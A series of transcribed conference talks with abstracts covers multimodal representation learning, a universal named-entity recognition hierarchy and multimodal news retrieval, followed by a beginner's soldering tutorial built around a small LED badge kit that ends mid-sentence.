was another contribution. So future directions, we wanna train systems with not just images and text, but other modalities. And we'd like to include other languages because the tasks that we chose only had English, but we'd like to include many other languages. We're working on something just in that space at the moment. And we'd like to extend the probabilistic techniques for representation learning. Because we think there's lots more value we can get out of these particular approaches. So just for example, if you have VAE approach, you can create new samples. So if you have class imbalance, you can create new samples in your underrepresented minority classes. So with that, I'll stop them. Thank you for your time.
We learn about the world from a diverse range of sensory information. Automated systems lack this ability as investigation has centred on processing information presented in a single form. Adapting architectures to learn from multiple modalities creates the potential to learn rich representations of the world - but current multimodal systems only deliver marginal improvements on unimodal approaches. Neural net-works learn sampling noise during training with the result that performance on unseen data is degraded. This research introduces a second objective over the multimodal fusion process learned with variational inference. Regularisation methods are implemented in the inner training loop to control variance and the modular structure stabilises performance as additional neurons are added to layers. This framework is evaluated on a multilabel classification task with textual and visual inputs to demonstrate the potential for multiple objectives and probabilistic methods to lower variance and improve generalisation.
10.5446/50454 (DOI)
So, good afternoon everyone. First of all, thank you all the organizers. It's a pleasure to participate to this workshop. Of course it would be better if we could all be together in CREIT, but we couldn't predict the situation. But again, I'm really happy to share the initiative I have been working on together with my colleagues to create a universal NEMNC recognition framework. And also thank you, Osamu Odin, for introducing the NER topic in your presentation. So my PhD research topic concerns multilingual natural language processing pipelines for European under-researched languages. And of course, NEMNC recognition and classification is part of it. So when I started doing the state of the art concerning these languages, I could see that compared to other NLP tasks such as part of speech tagging and then dependency parsing, when we talk about NEMNC recognition, we can, there are so many different approaches, so many different proposed hierarchies, which make comparison between languages quite difficult. For example, I think you are all familiar with universal dependence initiative, which proposed specific rules for part of speech annotation, morphological features and syntactic dependencies, but when you talk about NEMNC recognition, there's no such thing. So in this table, you can see the work that has been done concerning NEMNC recognition. And you can see there's a great variety between them concerning number of levels and number of notes per level. There are some initiatives such as the ones proposed by message understanding conferences, MUC, and they propose some quite specific guidelines for annotation, but it's not followed by everyone. And as I told, it makes quite hard when you try to compare different approaches in multilingual perspective. Of course, we can see some similarities between them when you take basic classes such as personal location organization, but when you compare all these approaches, you can see even very high complex structures such as proposed by Sikin for English, but also for Japanese. In this slide, I just wanted to illustrate how different two approaches can be. On the left side, you can see the check name entity hierarchy composed by two levels, one here and the other one here, more complex. And on the right, you can see the second harem, a structure proposed for NEMNC recognition in Portuguese. And here, you can even have a third level for a different, for more specific classification. So our idea was to create an universal multilingual annotation NEMNC scheme following the work done by Sikin. And why Sikin? Because it's from what we have analyzed was the most complex one and therefore most more complete and it fits better the idea of universal framework. So the first step of our work and what's presented today is the analysis of the Sikin hierarchy and the changes we've done so that it could fit in our universal idea. And the second time that will be presented in future work, we will use this framework to annotate multilingual parallel corpora, the SC times. It's composed by news from the SC times portal for 10 Southeastern European languages plus English. So here, just some information of how UNER was composed. As I told, we checked every Sikin class, we analyzed the structure and we made some changes, like reorganization of some nodes, especially to make it more similar to other works such as harem and the check NEMNC structure. We have also introduced some new nodes such as personal event, brands, nodes that we found out to be pertinent. And we have made a major change in the time expressions node. We divided it in absolutes, which considers expressions such as December the 2nd, 1989 and time expressions relative, which would consider expressions such as last Sunday. Here in this table, you can see the description of the UNER hierarchy. So we have five levels, level zero is the root from which derives all the other nodes and level one has three different nodes, name, time expressions and numerical expressions. And the name node contains the other classic NEM entity classes such as personal location organization. In this slide, I know you can't see anything. It's for you to have a glance of how UNER structure is. It's quite complex. The first big block is the name node. This one is the time node and this one is the numerical expression node. This version is the version 1.0 and it's available at this link. You can also find the link in the website, in the published paper. And please go check it. And as I told you, this is the first version. All your comments are valid. It will help us when we release enhanced versions of UNER. Just some words about the perspectives before I finish my presentation. As I told, the next step will be the annotation campaign. We started it and we have two different approaches for the name node. We are using automatic annotation using Wikipedia, the Wikipedia data. And for time and numerical expressions, what we are doing will annotate the English SC times corpus with existing tools and then we will propagate from the English corpus to the other parallel corpus in SC times. And of course, once we've conducted these annotation campaigns, we will evaluate the quality of the automatic annotation by using crowdsourcing campaigns to analyze random sentence and check how well this annotation is done and also train models using UNER data sets at SC times and check how well they can do this task of a very complex name and see recognition and classification. And here are some references. Thank you very much.
We introduce the Universal Named-Entity Recognition (UNER) framework, a 4-level classification hierarchy, and the methodology that is being adopted to create the first multilingual UNER corpus: the SETimes parallel corpus annotated for named-entities. First, the English SETimes corpus will be annotated using existing tools and knowledge bases. After evaluating the resulting annotations through crowdsourcing campaigns,they will be propagated automatically to other languages within the SE-Times corpora. Finally, as an extrinsic evaluation, the UNER multilingual dataset will be used to train and test available NER tools. As part of future research directions, we aim to increase the number of languages in the UNER corpus and to investigate possible ways of integrating UNER with available knowledge graphs to improve named-entity recognition.
10.5446/50455 (DOI)
Next, we will have a brief introduction. Then we will go for the purpose of the paper, the data set used, methodology, evaluation, and conclusion. In the new digital era, information is available in multiple modalities, like image, video, audio, text, and multiple languages all over the world. Specific news, which is affecting our daily lives. Multimodal news analytics is useful for industries to understand market needs and improve their financial status and people to search for their desired news. News is available in multiple domains, like sport, health, politics, and different modalities, which makes it difficult for the analysis. So intelligent technologies are needed to process the multimodal contents of news to extract the useful information. The purpose of this paper is to analyze multimodal features for news retrieval. To this end, we utilize different multimodal feature extractors on collected news and study impact of existing state-of-the-art feature extractors from text and image for the retrieval task. We use an unsupervised method and do the experiments in multiple news domains for German and English. Collect the data set. We extract news articles from five domains, such as politics, health, environments, sport, and finance, for 25 different events, for example, Brexit and coronavirus, regarding a maximum of 20 news articles per each event. In two languages, English and German, we have 348 articles for English and 263 for German. As shown in this table, this example, each news article contains a title, body text, and image. Next step is to extract multimodal features. For images, we use different variations of one of the most well-known deep models, ResNet. So we have three different descriptors. Object descriptor is different. Object descriptor is trained on ImageNet. It's focused on visual features of objects in images. Place descriptor is trained on Places dataset, giving scene textures of the images. And location descriptor includes broader domains than place descriptor, such as indoor images and extracts their location information. For text, we use two descriptors. One is BERT, which converts text to vectors of numbers, considering the concept of the text. And the other descriptor that we use is Entity Vector, for which we use SPACY to extract named entities. And Wikipedia has a named-encil-linking tool to disambiguate. So if we do this for the whole dataset, it gives us a dictionary of entities. Finally, we convert each text to a one-hot vector regarding the existence of each entity in the text. Do the retrieval task first? The mentioned features are extracted for the whole dataset for both languages, English and German. Then each article is considered as a query, and the rest is considered as reference articles, which will be retrieved. For each article, reference articles are ranked based on cosine similarity regarding each of the features. So goal is that articles which are in the same event category as the query should be ranked on the top. To do the evaluation, we use average precision, as you see in the formula, which R means recall and P means precision. For each query in the retrieval, eight different formulations are considered, including individual, visual and textual features, combined single-model features, for which we average the features, and multi-model features, where we average all the textual and visual features. Average precision is computed for all the queries regarding relevance of the ranked list of the retrieved news. And then average for each domain or more specifically each event. In the stable, investigation of different features and different domains for English and German news is shown. Yellow columns and highlighted numbers show average precision for combined textual features and combined visual features, and green box shows the same for German. As illustrated, textual features are better descriptors than visual as you see from the highlights. Since in English, in four domains, it outperforms, and in one domain, it is equal to visual, and for German, it outperforms in three domains. Reason for different results for the two languages is that the name-dentery recognition tool that we use for the textual features in German text is not as good as English, and we will see in more depth in the next table. Here you see, among all combined features, multi-model features are best descriptors. For German, it is obvious, because in three out of domains, it outperforms, as shown in green highlights. For English, even though visual features are not better than textual in none of the domains, they help improve the performance when combined with textual for some domains like environment and health, as shown in red boxes, which are improved by 10%. In this table, you see pure information which presents more in-depth investigation of different features in different... for different events and different domains. Each row shows results for each event in its corresponding domain. For example, in the environmental domain, palm oil production in Indonesia, and in finance, Volkswagen emissions scandal. The first three columns show average precision using textual features, and the next four columns show visual features, and the last column shows combined multi-model features. Best feature for each event is highlighted in green. As blue boxes on the table show, multi-model features are best descriptors and outperform in 11 events in total. Red boxes show that in these cases, that's multi-model outperforms, visual features help improve the textual, despite not performing well individually as we saw in the previous table. In politics and finance domain, in most events, textual features outperform multi-model. The reason is that these domains do not have location and object clues. Besides, richness of text is another reason, because they include specific entities that makes them unique, such as Volkswagen and Brexit. Here, the blue boxes show that entity features outperforms all individual features, proving the fact that named entities in news analysis are of high importance. So, what is done in this paper? We analyzed the impact of different features for multi-model news retrieval. We proposed an unsupervised approach for news retrieval on 25 events extracted from five different domains for English and German. What's the outcome? Multi-model features outperform individual textual and visual features. More visual descriptors are needed. In some events, categories such as face recognition, politics and sports, and textual feature of entity overlap outperforms and other individual features. As future work, we can apply these types of methods and increase the set of features and extend the dataset to more domains and languages. That's it. Thank you for your attention.
Content-based information retrieval is based on the information contained in documents rather than using metadata such as key-words. Most information retrieval methods are either based on text or image. In this paper, we investigate the usefulness of multimodal features for cross-lingual news search in various domains: politics, health,environment, sport, and finance. To this end, we consider five feature types for image and text and compare the performance of the retrieval system using different combinations. Experimental results show that retrieval results can be improved when considering both visual and textual information. In addition, it is observed that among textual features entity overlap outperforms word embeddings, while geolocation embeddings achieve better performance among visual features in the retrieval task.
10.5446/50653 (DOI)
Hello friends, Joe here from Hacker Boxes. Today we're going to learn how to solder. And we're going to learn to solder using this cool little kit, which we call a badge buddy. It has some blinking LEDs and a battery and a switch. So not many components. It's pretty easy to make. It's a nice first start if you haven't soldered before. So first let's talk about what is soldering. So soldering is just melting solder, which is a alloy, a metal alloy that has a very low melting point. So we melt the solder using a soldering iron, a tool like this, and we melt it between things that we want to connect together, usually connecting them electrically, although we will discuss that there's more to it than that. We see things that are soldered all the time and we have the entire world around us as full of electronic gizmos that have components soldered on the circuit boards. So it's a big part of our lives whether we stop and think about it or not. Being able to solder is a really nice skill to have because you can repair things, modify things, connect wires to things, read data in and out of them. It's a really excellent hacker skill, a nice DIY skill. Once you get into it you'll find that it comes in handy a lot and it's one of these skills that you can kind of apply to a lot of different things. So all right, I thought I would start by just saying, you know, kind of big picture. There's kind of two things that we want to kind of keep in mind that are really important. One of the first one is pretty obvious and it's almost sort of a joke. I've probably seen these pictures online. This is a soldering iron. It's off obviously. If it smells like chicken you're holding it wrong. Okay, always hold the rubber handle. So that's the first big picture item. The next big picture item is to realize that you always need more solder. And I don't mean by that that you need to go out and always buy some more solder because you need to have lots of solder, but when you're working, soldering, working on some work that needs to be soldered, you'll find initially that generally you need more solder than you think you need. And when something isn't working right, you need to add more solder to it. And sometimes that's counterintuitive, especially when we're trying to unsolder something. Adding more solder is a vital part of unsoldering. So just keep those two things in mind. The first one's obvious. The second one can be a little counterintuitive. It smells like chicken you're doing it wrong. Number two, you probably always need more solder. Just don't be afraid to add more solder. So solder serves three purposes. I think this is one of these important things because there's some subtle importance to these three different things and they're different. And contained in the fact that these three things that solder does are separate jobs of the solder contained in that are some of the common problems that people have as they're getting into soldering. So the first one is almost obvious. It's that soldering mechanically connects two things. So it's almost like glue. You're almost using it like a hot glue. You melt it between two things and it connects them. But is that enough? Certainly not because really often the main point of the solder, aside just holding two things together, is you have to have a good electrical connection. Something that current will flow through. Not something that will easily break apart and not something that actually has small gaps in it. So if you go at it thinking, I just need to get these two things stuck together like glue and you don't think about needing to have that really nice electrical bond, you might be missing something. And the third thing, which is this is the part that's a little subtle that often people miss in the very beginning. And usually this is one of these things where when you get this, usually your soldering game goes up to the next level. And that's that one of the jobs of the solder is actually a thermal conductor. And what I mean by that is, because there's two different ways that that's true. But the one that's really important is that it is the solder that allows heat to flow from the soldering iron onto the work. Okay, so if you don't have solder in the play before you even start soldering, in other words, if your tip isn't tinned, if you don't have the work, the pieces of work, meaning the wire in the pad or whatever it is you're trying to solder together, you don't have solder in play. There won't be a thermal conduit for heat to go from the tip of the soldering iron into the work, which is really what you want to do as we'll discuss. So just remember that part of the job of the solder is to actually be a thermal conductor. Okay, so it's a mechanical bond, it's an electrical conductor, but it's also a thermal conductor. And the second way in which it's a thermal conductor is in some instances where you have components to get warm while they're operating. So maybe let's say a linear regulator or something. It being bonded with solder onto a PCB or some other substrate can allow the thermal energy to flow out of it to keep it cool so it doesn't overheat. So that's kind of a secondary way, but what I'm really talking about when I say this subtle thing about thermal conduction is while you're soldering, you need the solder to help do the soldering. Okay, it isn't just a glue, it's actually a conduit of the making of the connection. Alright, so try to keep that in mind. So let's talk about some of the tools and supplies that we use in more soldering. The first obvious one is a soldering iron. So the really cool thing about soldering irons is in the last 15 years or so, they've, the price profile of soldering irons has changed quite a lot. Now for what would have been unheard of 20, 30 years ago, you can get for a price that would have been unheard of, meaning even as little as like 20, 30, 40 dollars, you can get a very nice soldering iron. I know the soldering irons, you know, that I came up wishing that I could have had, but I only had access to them in a lab because they were $250. You know, now, you know, we get soldering irons all the time that are in the $20 range that are of similar quality, you know, controllable temperature and very nice, you know, tips that keep, that stay very clean for a very long time. So that's, that's a nice thing as soldering irons are readily available now and they're not super expensive. I mean, you can still spend a lot of money on a really nice soldering iron, but you know, generally what you really want is just one that has a nice quality tip that's, that's replaceable. Although you'll find you might not actually need to replace it very much if it's a nice tip and you need to be able to adjust the temperature because there are times when you want a little more heat on the tip or a little less heat. You also just don't want it to just always be some preset random amount. So, you know, really inexpensive soldering irons don't have a temperature adjustment. All right, and another tool or part of a tool you'll need is, you'll need to always be able to clean the tip of your soldering iron. Basically, I have to keep it clean all the time. If you're thinking always clean the tip or constantly clean the tip, you'll end up cleaning it a lot, which is what you really need. You need to clean that tip very, very frequently while you're using it. It's not just something you do at the very end while you're putting it away. So, most soldering iron stands come with a little, little sponge, SpongeBob, SpongeBob Square Sponge like this, that is just at the bottom of the stand. Just get that wet. Some people keep a little bottle, like a little drinking water bottle next to their soldering station so they can always just keep that thing wet when I've been to run off to get it into the sink. That's fine for when you're starting out, you know, just rub it on that sponge, rub the tip of your iron on that sponge frequently, like almost every time you put the soldering iron down or pick it up, just constantly be cleaning it. And then as you get a little more into soldering, kind of like a style point tool is you'll, you might get one of these little, kind of shaved metal tip cleaners. These are pretty nice you, you, make sure to get this on the camera right here. You just kind of stab the soldering iron into it, scrape, scrape, scrape, and it scrapes the tip of the soldering iron. You can just do that frequently while you're using it. Every time you go to set the soldering iron down or pick it up, just kind of stab it in there a couple times. So the nice thing about the metal, the kind of, it's almost like a little billow pad, it's like a, I think they're usually made of brass and it's like metal wool. I think people call metal wool or steel wool. It's not technically steel wool, but these type of cleaners, the really nice thing about them is because they're not wet, they don't conduct as much heat away. So, so that's really good. Yeah, so those are probably the main tools you need. It's also nice to have some flush cutters, like you know these little guys, which are really very tiny, and one side of them is flat, so you can cut wires off flush to a circuit board. At some point you will, you'll come, you will want to be able to remove the residue that's left on a circuit board after you solder it. You know, this is called cleaning the flux, so you'll want a flux cleaner or a lot of people just use rubbing alcohol, isopropanol, and a little very stiff brush, an acid brush to just clean the back of the board. In the beginning, you really need to worry about that too much. You can, you know, just clean it with a tissue or just, you know, don't worry about it too much for a board like the one we're going to do today, but when you start making circuit boards, you want to be able to keep for a while, you want to take, be able to take that residue off, and we'll discuss why you want to do that. So you'll want the, whatever solvent you're going to use for that, like I said, isopropanol is usually fine, and maybe a little brush or something, and at some point you're going to want to have flux that you can deliver to the board. So flux is the thing that cleans the work, it cleans the surface that you're going to be soldering on. It also breaks the surface tension of the solder when it's liquid so that it can flow a little easier, so it's a cleaner and a flowing agent, and flux is just kind of important. I have heard some people refer to flux as grease, so have you heard people say that? That's what they mean, but it's not grease. It's, it comes in a liquid or gel, or it comes in little pen dispensers that look like a fat magic marker. A lot of people these days really like the gel, that's become readily available. I usually use the liquid just because that's what I've always used, and I get a little dispenser bottle. Let me see if I have one of these, a little dispenser bottle. These are extremely inexpensive, so you can have a few of them loaded up, and you can see the flux that I have in there is a liquid. So you're going to want some flux. So the, like I said, there's a bunch of different kinds of flux. The most basic kind of flux is rosin. I don't know if it says it on here. It says flux on there. I don't know if you can see it. It's a very, it's a very tiny, but for the most part all the solders you're going to use, we'll discuss the soldering in a second. They're rosin core, meaning they have rosin flux inside the solder. So when you're using the solder, it's kind of auto-fluxing, it's self-fluxing, so you don't need to apply flux from a pen or a bottle, but as you get a little more advanced in soldering, you're going to want to have flux. But for the very beginning, using the flux that's inside the solder is totally acceptable. You'll be able to get away with doing a lot of work just using the flux that's inside the solder, but I'll speak more to that in a minute. There are some things you have to keep in mind when you're using the flux in the solder. So that flux is what leaves a residue on the board sometimes when it's, when you're done soldering, and you might want to clean that off, because the way the flux cleans the surfaces, it's usually an acid. It's not a super strong acid, but it's acidic, and if you leave it on there, it's great when you're trying to solder because it'll clean the oxidation and dirt and oils off of the work so that your solder will flow, but if you leave it sitting on there for a long time, it might eat into the board a little bit or pit the surface, and plus it just usually looks a little yucky, so it's kind of nice to clean it off. But for your first few projects, and certainly for this soldering, this first batch, buddy, don't worry about that. But just know what flux is at the point where you want to start cleaning flux or using a separately applied flux other than just the flux core in the solder. It'll come to your mind that, oh, I want this other thing, and just worry about it then. You don't need to worry about that for right now. But yeah, so as far as the solder goes, there's a lot of different options when it comes to solder. The basic options are tin-lead alloy, and just basic, a lot of people call it 6040, although there's slight variations. They're not always exactly 6040, 60%, I think it's 60% lead, 40% tin, or it might be the other way around. I'm not sure, but let's see, it might tell us on here. 60% tin, 40% lead. That's kind of the basic solder. It has a, like I said, it has a flux core in it, and this one right here, you can see it's very, it's fairly thin. This is a 0.6 millimeter solder. I usually get 0.6 or 0.8 millimeter. I've used one millimeter before too, that's fine as well. But you generally want something that's fairly thin. If it's too thin, when you're soldering something larger, like a connector or something, or something that has like a big heat pad or something, you'll find that you need to use a long length of it. That's not a big deal. Just use a little more. Some people like to have a thicker one for doing stuff like that, and then the thinner one for doing smaller work. That's not, nothing you really need to worry about right now. One thing I do want to comment on is a lot of people get caught up in the lead-free solder. And of course, talk about safety in a little bit. Lead is potentially toxic substance. So if you're concerned about it, you can use lead-free solder. I don't. Most people that are really into soldering really hate lead-free solder. It has a much higher melting point. It's very annoying to work with. It's really hard to rework. It's just not the best thing in the world. And if you're pretty careful, you shouldn't be sticking soldered wires or circuit boards in your mouth anyway, or letting children play with them. So you don't get lead inside of you by simply by touching it. You have to touch it in and lick your hands, or you have to chew on the thing that has the lead on it. Lead doesn't just float up in the air. So of course, if you're working somewhere and they have safety policies on this, read your safety data sheets and all that, that's not my expertise. But I can just tell you that most people that are soldering experts, they prefer to use the standard 60-40 leaded solder. It's just much, much easier to work with. Lead has a very low melting point. So anyway, those are the kind of solder things you need. Speaking of melting point, if your soldering iron has an adjustable temperature on it, a common question is, well, what do I set that at? So I usually set mine right at about 350 degrees. That's Celsius. Maybe a little higher than that sometimes, and that works out to about 660 Fahrenheit if you have an older rig that has a Fahrenheit rating on it. So yeah, just kind of keep in mind like 350, 360, something like that. And you can go a little lower if you're working on something really fine and you're worried about heating it up too much, or a little higher if you're soldering like some big screw lugs or something that needs a lot more heat delivered. If you kind of sense that your tip is getting cooled too quickly, you might want to just turn the temperature up a few degrees. So remember that 350C or 660F will kind of keep you in the right range from melting the lead tin alloy solder. If you decide to use lead-free solder, you're going to need to go up a little bit and you can find the specifications for whatever solder you're using. It'll have a melting point, but the tip temperature needs to be much higher than that melting point. It'll usually have a melting point than a specified tip temperature. Alright, so yeah, so temperature, soldering arms are really hot. So we joked before about the chicken thing. I'm going to mention it a few times, because you just want to be careful not to burn yourself. There's a few safety points to keep in mind here. That's probably the one that we almost don't need to mention. I mean, we're melting metal. Of course, it's hot. Don't stick your fingers in it. Don't clean it on your tongue. Don't all those things, right? So just remember it's hot. The next safety point, we're going to have four safety points. The first one is heat. Don't burn yourself. Don't burn yourself. Don't burn your desk. Don't start a fire. Just remember it's hot. Heat. The first one is heat. Number one, heat. Number two are fumes. A lot of people think this has something to do with the lead. It doesn't. It's when you're soldering, there's that rosin core in there and the flux, that rosin core, it will gas off. It'll make kind of a smoky smoke and you don't want to breathe that. All right? So you want to have a little, what I have on my workstation is I actually just have a small fan and it just kind of blows into the corner because that smoke, that residue, it'll settle very quickly. So if you just blow it away from your work, that's probably fine. I don't recommend this, but I've actually noticed even with my fan on just because I've been soldering for so long, when I solder, every once in a while, I'll just go, and I'll just blow the smoke away. If the smoke is rising up into my face, I don't want to inhale it. So I just, and then I inhale. Probably not smart, probably not safe. Just keep the fan on. You can buy a really nice little fume extractor hood that has a little, like a filter, I think it's a charcoal filter in it that keeps the, gets the soot trapped and it's very nice. So if you're going to solder a lot, you might want to get one of those. You don't want to be breathing those fumes, okay? So number one was heat, number two was fumes. Number three is lead. We already talked about the lead. So when you're soldering with lead solder, lead can get on your hands, just like, you know, if you were touching a lead pipe or something like that. Also, little bits of lead break off. I think it's called dross and, you know, maybe even, they're almost microscopic. Sometimes they are macroscopic, but, and you'll even notice little bits of little tiny balls of solder around your, your work area after you've soldered a lot. That stuff is called dross. And if that's sticking on your hands and then you lick your finger or you eat your lunch and haven't washed your hands, that lead can get in you. That is particularly a problem for children. So if you're soldering in an area where there are children, you want to clean that lead up. Like so, right? After you work with leaded solder, you need to wash your hands, okay? And this isn't a hand sanitizer situation because this is not, you're not trying to kill bacteria or something. You're literally trying to wash a metal away and get it off of your hand so that it doesn't get inside your stomach in your mouth, okay? And also, if you have these little draw spits and there's a child in the, you know, in your, that comes through your little, your work area and they're very little and they might, you know, drop a toy somewhere where you have these little draw stropings or whatever and put it in their mouth. Or if you saw, if you've recently soldered something and they might say, oh, look, that's a cool badge buddy and stick it in their mouth. That's not cool. You don't want to get lead inside you. You do not want a child getting lead inside them, okay? It's not that big of a deal. There's other things in your house that's lead, but you do not want little chunks of lead, you know, that break off of things sitting around. Just wipe it up with a wet wipe. Wash your hands, clean it up. Just keep it clean. Don't get this lead around the place. Wash your hands after you work with lead and solder. All right, so heat, fumes, lead, right? Those are three things. And then this last one is huge because people just don't think about it that much, but please wear safety goggles. You don't want to get, you don't want to fling a little drop of hot solder in your eye. You know, a really big thing is, you know, you're cutting your leads off, especially ones that might be a little thick and they go and the lead flies off and it hits the wall and you're always like, oh, well, that sounded nice. Well, that doesn't sound nice if it hits you in the eye. All right, you only get, you actually get two eyes. Anyway, you probably want to keep both of them. So protect them where some eye protection, all right? You only get those two eyes. All right, so great. So let's actually get the soldering now that we've covered sort of the theoretical background stuff. I guess this might be a good time for me to say there's a lot of great soldering videos out there. If you just get on YouTube and look for things about soldering, you'll hear mostly all these things I already said, but you know, maybe you'll pick up some other pointers and sometimes it's good to hear things explained from different people. So, you know, if you like soldering and want to get better at it, definitely watch some other videos. You know, we're only going to barely touch on, for example, surface mount soldering. So there's some great surface mount soldering videos out there that you can find. So that nice segue to our next thing, you know, I like to think of there being three structures for soldering. Two of them we're going to do here today and that's through hole soldering. When you have a hole in a circuit board, like, you know, it's called a through hole, a plated through hole, and you put a wire or a post through it and then you solder it into that hole. Right? There's through hole soldering and then there's surface mount soldering where you have a pad on a circuit board and you solder something onto that pad so it doesn't go through the board, it just solders onto the surface. And you know, when you see these like really large chips that have, you know, many tens or even hundreds of little leads sticking out of the sides, those are all surface mounted or these little tiny resistors that look like little rectangles that don't have any wires, like those are surface mounted. Today, we're just we're going to do one really big surface mount thing and that's our battery clip, but it gives you the idea what surface mounting is so it's a nice exposure for that. So we have through hole surface mount, through hole is some called TH, sometimes called TH. Surface mount is often called SMT, surface mount technology. And then the third thing is just, I guess I might call it point-to-point soldering and it's when you just solder two wires together, you usually strip the two wires, twist them together and then solder them and making sure you get solder flowed completely into the joint. Another example of that kind of point-to-point soldering is when you're soldering a wire into a connector or something like that. So that isn't exactly through hole and it's not exactly surface mount, it's just a different kind of soldering. But you know, if you always think of those three things, they all kind of work the same, but they all have little, you know, differences that, and it's nice to make sure you get some practice in doing all three of those. All right, so let's get right into this example. Actually, first let me just say, you know, the, so the basics of soldering are, and we've already touched on this a little bit, so I'm gonna say these things a few times just to make sure they really sink in. So you have two, let's say, let's say you just have two surfaces, you either have the hole with the wire in it, which is, you know, the hole is a surface and the wire is a surface for through hole, or you have pad with a terminal of a component sitting on the pad if it's surface mount. So, but there's usually two things, right, the pad and the lead or the hole, the through hole and the lead, the plated through hole and the lead, and what you want to do is heat up the junction, so those both of those things, you want to heat both of the things you're trying to connect hot enough so that solder will flow onto them. All right, so there's a few things that you're trying to do all at once here, so when you go to heat them, you need to have some solder between the soldering iron and the connection, and this is not the solder that you need to flow into the connection later, this is just the thermal connecting solder. So, you have the two components sitting together, so often what you'll do is you'll have the two components, you know, near each other in some way, they're next to each other, either inside of each other, sitting on top of each other, so you put the iron near them, get a little solder on it, on the iron, just so that that solder can touch to the work and conduct heat into the work, right, so that's not the solder that makes the connection, it's the solder that is used, it's solder that's used to enable the connection to be made by allowing the soldering iron to then heat the items up, right, so that first little bit of solder you put on there, you're really putting it on the iron and it heats up the two items, right, that heats up the work, let's call it the work, and then once the work is hot enough, it's up to that melting point of solder, then you touch the solder to the work, not to the iron, and the work will melt the solder onto itself, and that's how you get a beautiful, nicely flowed solder connection, where the solder flows onto the work and is not just kind of being brushed on there by a soldering iron, alright, so again you don't, you do not use the soldering iron to apply the solder, you use the soldering iron with a little preliminary bit of solder on it to heat up the work enough so then the solder melts onto the work, right, so anyway that's a thing that, you know, when you get it, when you get that really nice flow of the solder on something, when you have the metal really hot and then the metal melts the solder, not the soldering iron, the soldering iron really heats the metal up, the trick is you need a little solder initially to be able to get the heat from the soldering iron into the metal or the work, so that's one of the main things you're doing there, the other thing is remember your solder has your, especially, you know, if you're using, you don't have a bottle of flux, you're just using a Rosincorps solder, your solder has your flux in it, so you need to be adding solder, I don't want to say constantly, but the process of making the solder connection, you need to be adding solder because the flux comes out when you melt the solder, all right, so before you make the connection between the two pieces of metal, then those surfaces need to be, they need to have flux on them, so you have to melt the solder in their vicinity so that the flux gets on them and then that allows the solder to flow onto them, so the two things kind of happen at once, the heating and flowing of solder and the application of flux because they're coming in the same delivery package, right, the strand of flux you're using has the Rosin, the strand of solder you're using has the Rosin flux inside of it, okay, and another important thing about that is sometimes when you get solder on a connection and you're moving around or you're still working the connection in some way, the smoke that came up, that's your flux burning, it's your flux boiling off, that smoke that came up, they got sucked away or that, you know, if you followed my incorrect instructions you blew away, so now that flux is gone, okay, so that's one of these things where you need to add more solder because the solder has the more flux in it, right, so if you're continuing to work the item you only have so long before your flux is gone, okay, and then, you know, if you get to the point where you've melted a bunch of solder on it and there's this big mess, you need to take the solder away, which sometimes you can just lift it off with iron, it'll stick on the iron and you can, you know, clean it on your sponge or your metal tip cleaner, and then you can apply some more fresh solder, which will have new flux in it, releasing a little more smoke, so this is part of that thing I said where you need to be always ready to put a little more solder on because you need the solder because it conducts the heat, you also need the solder because it has the flux inside of it, and the flux doesn't stick around, you only get a few seconds to use to flux the surface with the solder, that's why, you know, you need to keep adding more solder, even if then you get to the point where there's too much metal on there, too much solder, you just pull it off, just clean it off, you're gonna need the flux, and when you get a little more advanced with this stuff and you're doing a lot of connections, you know, really small packages that have a lot of pins, that's where you just want to get a bottle of flux and just drench the thing with flux or put gel flux on it so it's all soaked with flux because then you can work it, you can move the solder around, you can add and remove solder, and the flux is still there doing its job of cleaning and breaking the surface tension of the molten solder. So this is the badge buddy, comes in a Ziploc bag like this and there's some stickers in there, if you got this during Defcon 28, we did some sticker swapping, so there's a bunch of different stickers in here from lots of our friends and members in the community and other vendors, and you see such as Hack 5 and Hacker Warehouse and just random stickers, so that's lots of fun. And, you know, let's see, yeah there's some good ones in here, yeah there's the Hack 5 sticker, a couple Hacker Boxes stickers, hologram sticker, yeah Hacker Warehouse gave us these, they have some little camera covers on them to keep your camera safe. So, all right, the parts that are in here are fairly basic and represent opportunity to do a little bit of surface mount and also some through hole soldering. There's a bead chain that you can use to connect the badge buddy to your lanyard or your backpack or whatever when you're done. There's a coin cell battery, it's a lithium battery, a CR2032, it's pretty common lithium battery coin cell. That's the clip that holds the coin cell onto the back of the PCB. All right, let's get these things out of our way here. Solder these four items to the PCB to the circuit board with logo on there's the Hacker Boxes logo, his name's a bit head or circuit head depending on which version he is. We're gonna get some solder out, we're gonna start by tinning the tip of the soldering iron, this one's already tinned because we use it a lot and then we're gonna tin these three pads, these service mount pads on the board but you want to always keep the tip of your soldering iron tin, keep some solder on it, you know, it'll get the flux will help clean it and every time you see the soldering iron going off the screen here that's just me cleaning the tip on in a tip cleaner. So we're gonna tin these three pads by just you know getting some solder flowed onto them and again we're not just melting it on there we're actually it's actually bonding into the into the pad the solder that's already on the pad from the manufacturing process and when your surface mount soldering well with any soldering you really want to pay attention to the orientation so this little clip is oriented according to the white paint on the board that's called the silk screen. So the board has been silk screened with these positioning indicators and most boards have have this when you lay out a circuit board you can design the silk screen so the silk screen shows you which direction that the battery holder goes in and in this case you could put it the other way it's just a little harder to put it in so we intentionally oriented it so the the clip opens downward so now what we're doing is where I'm getting solder to flow onto the onto the little wings on the side of this battery clip battery holder and we're actually heating the the clip up enough so that solder flows onto it so remember we need a little solder on there just to conduct into the metal of the clip and then you can see the solder flows really nicely it makes a nice shiny surface so you want to make sure when you're soldering you always end up with a shiny surface that flows neatly on all of the metal around it and that lets you know you do not have what's called a cold solder joint if you just dump hot solder on a cold metal it won't flow onto the metal and it won't bond and that will be a cold joint which is mechanically unstable and can be broken off pretty easily and you do you never want that and that's like the most the most important thing to avoid while you're soldering is getting cold solder joints but you can see these are nice well flowed well it's called wetted the solder is fully wetting the board so yeah so the indicator on the silk screen for the LEDs shows the flat side so the LED has a flat side on it and the the the flat side goes to the short pin so the short pin is going through the board so that it lines up with a flat side on the silk screen you see this right here so this is an example of through holes see we're putting the leads through the holes we're gonna get them on the other side and you usually just bend the leads a little bit to hold it in place but then also we're gonna set the board down on the component side down which will hold the the pieces into place and that's why when you're soldering you often start with the the lowest altitude or the lowest thickness parts first because then as you flip it over you can get a um you can get the basically the table to help you hold them into place and then just things don't get in your way when you do that so again here we're just flowing solder we're using a little tiny bit of solder to heat up the joint and then getting the solder in there so that the the joint the heat of the joint melts the solder into the joint and there's just four little through hole posts here it's actually quite easy and you can see I'm moving pretty quickly because you know like I said you earlier you want to you want to be able to use the flux and the flux will will disappear over time so it's not it's not smoking anymore because the flux is gone so while the flux is still in there you want to get the work done so you do 